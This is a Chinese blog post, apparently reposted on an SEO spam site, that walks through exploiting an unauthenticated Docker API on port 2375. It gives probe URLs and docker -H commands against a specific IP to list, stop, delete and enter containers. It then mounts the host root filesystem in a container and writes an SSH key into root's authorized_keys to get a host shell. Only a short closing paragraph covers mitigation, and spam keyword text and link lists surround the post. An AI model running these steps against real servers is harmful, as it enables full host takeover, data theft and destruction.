当前位置: 首页 > wzjs >正文

专业房产网站建设公司温州微网站制作多少钱

专业房产网站建设公司,温州微网站制作多少钱,公众号可以做自己网站的超链接,个人做网站需要多少钱Docker API 未授权访问 是一个非常严重的安全漏洞,可能导致严重的安全风险。 什么是 Docker API ? Docker API 是 Docker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,…

Docker API 未授权访问 是一个非常严重的安全漏洞,可能导致严重的安全风险。

什么是 Docker API ?

Docker API 是 Docker 容器平台提供的一组 RESTful API,用于与 Docker 守护程序进行通信和管理 Docker 容器。通过 Docker API,用户可以通过 HTTP 请求来执行诸如创建、启动、停止、删除容器等操作。同时,Docker API 还允许用户管理镜像、网络、卷等 Docker 资源。用户可以使用任何支持 HTTP 请求的工具或库来访问 Docker API,从而实现与 Docker 容器平台的集成和自动化管理。

Docker API 未授权访问 

漏洞背景

Docker 守护进程(Docker Daemon)默认监听在 Unix 套接字(`unix:///var/run/docker.sock`)上,但有时为了方便管理,用户会将 Docker API 暴露在 TCP 端口(如 `2375` 或 `2376`)上。如果未正确配置访问控制(如未启用 TLS 加密和认证),攻击者可以直接访问 Docker API,从而完全控制 Docker 主机及其容器。

漏洞复现

1、快速搭建环境

dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375

如果出现如下报错,表明 Docker 守护进程在启动时失败了,原因是 docker 守护进程已经在运行

停止进程,重新执行刚才的命令,环境搭建成功

#1、确认 Docker 守护进程是否正在运行
ps aux | grep dockerd
#2、如果正在运行,先停止它
sudo systemctl stop docker

2、浏览器访问,这样即存在 Docker API 未授权访问漏洞

常见探测路径

http://39.105.123.35:2375/version
http://39.105.123.35:2375/info
http://39.105.123.35:2375/images/json
http://39.105.123.35:2375/containers/json    

3、攻击者便可以远程通过Docker客户端连接,以下为常见操作

#列出所有容器
docker -H 39.105.123.35 ps -a
#查看镜像
docker -H 39.105.123.35 images
#拉取镜像
docker -H 39.105.123.35 pull ubuntu
#停止一个已经运行的容器
docker -H 39.105.123.35 stop c198868f6660
#删除容器
docker -H 39.105.123.35 rm c198868f6660
#进入容器
docker -H 39.105.123.35 exec -it 08d28346ff2d /bin/bash

4、写公钥获取shell

#生成公钥
ssh-keygen -t rsa
#查看生成的公钥
cat /root/.ssh/id_rsa.pub
#运行一个容器挂载宿主机的根目录到容器/mnt目录
docker -H tcp://39.105.123.35 run -it -v /:/mnt --entrypoint /bin/bash nginx
#写入公钥到宿主机
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBA/ZttXREVO+V615UhA2GoQvfmy1JnyJ0eqPnDlAyMxTi9Jahr0IBzqfxk+6hZzdy1a22YwnAOYnSvjkpR8eOYnxb0UoVmXpWMRNqW34v8liJGbc6m1Y5FsottqZfZVRe1UzfvuuOPnUW+oboqT5SvGSH0EXKiQoNFy4fafxHv2mO5E3roac1G1CbA/oPhbnFzFy8qcYjpc1BwSYG60+0IUutX+j2GasXFsieHKyV9U6a9vWLW4OkNUjCnzc/NEbgP/JG7t19NOHrjp4+IA7MGoCfui6G7j8a+PKslJG1hKu/B6frVfWNHVMQkBcmBxZtcmnCxeu+e10YiBtEPi+7 root@master-1" > /mnt/root/.ssh/authorized_keys

5、容器逃逸:连接目标主机获取shell

ssh root@39.105.123.35 -i id_rsa

总结

Docker API 未授权访问是一个高危漏洞,可能导致容器逃逸、数据泄露、恶意软件部署等严重后果。通过正确配置 TLS 加密、访问控制和防火墙规则,可以有效降低风险。同时,建议定期进行安全审计和漏洞扫描,确保 Docker 环境的安全性。 


文章转载自:

http://PGDlIOMu.bpmnj.cn
http://Ef9P8Cp4.bpmnj.cn
http://9pdPSPEw.bpmnj.cn
http://efZfS4PM.bpmnj.cn
http://FNMAAQmz.bpmnj.cn
http://EzJ4DPdF.bpmnj.cn
http://yTywtBVO.bpmnj.cn
http://NH7LYa7z.bpmnj.cn
http://cMAY5IDC.bpmnj.cn
http://wI6NGiVX.bpmnj.cn
http://GqnvZFtF.bpmnj.cn
http://Ak7SgQR4.bpmnj.cn
http://IkWeuWkq.bpmnj.cn
http://Uql1oe4z.bpmnj.cn
http://TzUzIJln.bpmnj.cn
http://qLlYztNo.bpmnj.cn
http://0g1AiHsK.bpmnj.cn
http://p6F0Klxk.bpmnj.cn
http://mRylOCZi.bpmnj.cn
http://yvWfsxbP.bpmnj.cn
http://wovSaGFm.bpmnj.cn
http://mtwTNqdy.bpmnj.cn
http://VwFNEvAr.bpmnj.cn
http://jnQOUwTF.bpmnj.cn
http://6BYf1eq1.bpmnj.cn
http://nHWAQVBi.bpmnj.cn
http://v7OYSb4F.bpmnj.cn
http://iSNGw7tl.bpmnj.cn
http://kIsvDA1L.bpmnj.cn
http://mJj96Xtx.bpmnj.cn
http://www.dtcms.com/wzjs/743728.html

相关文章:

  • 青岛网站制作系统用page打开wordpress
  • 郑州做外贸网站比较好的做网站公司
  • 网站标题改不了东莞市建设培训中心网站
  • 医院网站站群建设方案龙岩公共服务平台
  • 咸阳网站建设有哪些优化软件是什么意思
  • 网站开发技术交流群软件开发包括
  • iis网站目录权限有人说做网站赌
  • 南京商城网站开发设计手机网站建设yu
  • 可视化网站制作软件佛山关键词排名方案
  • python做简单的网站亚马逊网官网首页
  • 网站的根目录wordpress 页面改造
  • 响应式网站广州网站建设北京市朝阳区网站制作公司
  • visio网站建设流程图百度竞价价格查询
  • 网站怎么做跳站it培训课程
  • dedecms 网站 经常无法连接如何做好搜索引擎优化工作
  • 如何禁止通过ip访问网站网页设计结果分析怎么写
  • 网站开发实验的总结pc端移动端网站开发
  • 专门做橱柜衣柜效果图的网站寻找电销团队合作
  • 2003系统做网站wordpress建站后
  • 娄底优秀网站建设wordpress主题二次元
  • 外贸网站图片嵌入式软件开发工作内容
  • 百度关键词点击排名网站优化原理
  • 做资源教程网站响应式网站是什么软件做的
  • 网站里面的视频功能怎么做js网页制作代码大全
  • 网站logo怎么做wordpress伪静态原理
  • 齐河县建设局网站免费开发微信小程序的平台
  • 上海建设工程 U盘登录哪个网站构建平台还是搭建平台
  • 阿里云服务器建网站网站建设预算知乎
  • 获得网站所有关键字wordpress文学站
  • 做网站托管服务器个人网站设计公司